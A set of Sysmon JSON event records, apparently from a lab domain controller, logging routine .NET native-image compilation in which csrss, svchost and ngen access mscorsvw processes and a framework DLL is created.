{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.772\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103BA40F00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.772","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103BA40F00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.772\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103BA40F00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.772","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103BA40F00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:42.990\r\nProcessGuid: {41C8662E-2292-5F25-0000-00103BA40F00}\r\nProcessId: 880\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\370-0\\System.Runtime.Serialization.Formatters.Soap.dll\r\nCreationUtcTime: 2020-08-01 08:06:42.990","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:42.990","ProcessGuid":"{41C8662E-2292-5F25-0000-00103BA40F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\370-0\\System.Runtime.Serialization.Formatters.Soap.dll","CreationUtcTime":"2020-08-01 08:06:42.990","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.037\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00109E4A0F00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.037","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00109E4A0F00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.037\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00109E4A0F00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.037","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00109E4A0F00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00109E4A0F00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00109E4A0F00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.068\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-0010DF4D0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.068","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-0010DF4D0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.068\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-0010DF4D0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.068","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-0010DF4D0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-0010F5AA0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-0010F5AA0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
